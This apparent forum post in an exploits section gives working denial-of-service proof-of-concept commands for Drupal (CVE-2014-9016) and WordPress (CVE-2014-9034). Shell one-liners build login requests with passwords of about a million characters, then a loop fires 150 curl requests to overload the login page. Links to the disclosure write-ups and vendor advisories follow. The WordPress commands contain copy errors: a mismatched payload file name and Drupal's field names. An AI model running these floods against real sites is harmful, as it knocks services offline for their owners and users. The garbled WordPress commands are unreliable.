Jump to content
devilox

CVE-2014-9016 and CVE-2014-9034 Drupal & Wordpress Denial of Service

By devilox, in Exploituri

Recommended Posts

devilox Newbie

devilox

Posted
Posted (edited)

Drupal Denial of Service CVE-2014-9016

Generate a pyaload and try with a non-valid user:


$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload

$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Generate a pyaload and try with a valid user:


$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data   valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Perform a Dos with a valid user:


$ for i in `seq 1 150`; do (curl --data   valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done

Wordpress Denial of Service CVE-2014-9034

Generate a pyaload and try with a non-valid user:


$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload

$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Generate a pyaload and try with a valid user:


$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data   valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Perform a Dos with a valid user:


$ for i in `seq 1 150`; do (curl --data   valid_user_payload http://yoursite/wordpress/wp-login.php  --silent > /dev/null &); sleep 0.25; done

Python Code

https://github.com/c0r3dump3d/wp_drupal_timing_attack

References

Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep

Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep

Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console

https://wordpress.org/news/2014/11/wordpress-4-0-1/

https://www.drupal.org/SA-CORE-2014-006

https://www.drupal.org/node/2378367

NVD - Detail

NVD - Detail

Source : CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep

Edited by devilox
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...